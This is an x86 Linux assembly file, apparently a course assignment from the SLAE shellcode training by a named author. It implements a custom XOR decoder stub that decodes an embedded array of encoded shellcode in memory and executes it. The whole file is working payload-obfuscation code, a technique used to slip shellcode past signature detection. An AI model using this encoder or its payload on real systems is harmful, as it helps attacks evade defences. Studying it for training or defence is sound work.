; SLAE - Assignment #4: Custom Shellcode Encoder/Decoder (Linux/x86)
; Author:   Julien Ahrens (@MrTuxracer)
; Website:  http://www.rcesecurity.com 

global _start			

section .text
_start:
	jmp get_shellcode
	
decoder:
	pop esi         ;pointer to shellcode
	push esi        ;save address of shellcode for later execution
	mov edi, esi    ;copy address of shellcode to edi to work with it
	
	xor ecx, ecx    ;clear inner loop-counter
	xor edx, edx    ;clear outer loop-counter
	
loop0:	
	mov al, [esi]   ;get first byte from the encoded shellcode
	mov bl, [esi+1] ;get second byte from the encoded shellcode
	xor al, bl      ;xor them (result is saved to eax)
	mov [edi], al   ;save (decode) to the same memory location as the encoded shellcode
	inc edi         ;move decoded-pointer 1 byte onward
	inc esi         ;move encoded-pointer 1 byte onward
	inc ecx         ;increment inner loop-counter
	cmp cl, 0x3     ;dealing with 4byte-blocks!
	jne loop0          
	
	inc esi         ;move encoded-pointer 1 byte onward
	xor ecx, ecx    ;clear inner loop-counter
	add dx, 0x4     ;move outer loop-counter 4 bytes onward
	cmp dx, len     ;check whether the end of the shellcode is reached
	jne loop0
	
	call [esp]      ;execute decoded shellcode
	
get_shellcode:
	call decoder
	shellcode: db 0xfb,0x91,0xf7,0xaf,0x60,0x0a,0x0b,0x50,0x33,0x02,0xf4,0xa2,0x0e,0x5d,0x37,0x35,0x9a,0x13,0xf2,0x3f,0xda,0x5a,0x05,0x92,0x9a,0x09,0xb9,0xdf,0x2d,0x7b,0x1d,0x75,0x38,0x3d,0x04,0x62,0xea,0xb9,0x30,0xd1,0xbb,0xd1,0xc1,0x90,0x24,0x73,0xfa,0x1b,0x4e,0x83,0x03,0xb3,0x62,0x04,0xb7,0xb3,0x86,0xd0,0x87,0x0e,0xd8,0x39,0xf4,0x74,0xe8,0x58,0x3e,0x7d,0x1c,0x4a,0x1c,0x4b,0x9a,0x13,0xf2,0x3f,0xbf,0x3f,0x66,0x3f,0xba,0x0b,0x09,0x9a,0xf9,0x49,0x76,0xbb,0x3f,0xbf,0xf6,0x8f,0x59,0xa0,0x10,0x1b,0xec,0x84,0xab,0x84,0xec,0x9f,0xf7,0x9f,0xf5,0xda,0xb8,0xd1,0x2e,0x40,0xc9,0x2a,0xfc,0xbd,0x34,0xfe,0xfb,0x36,0xb6,0x26
	len:    equ $-shellcode 
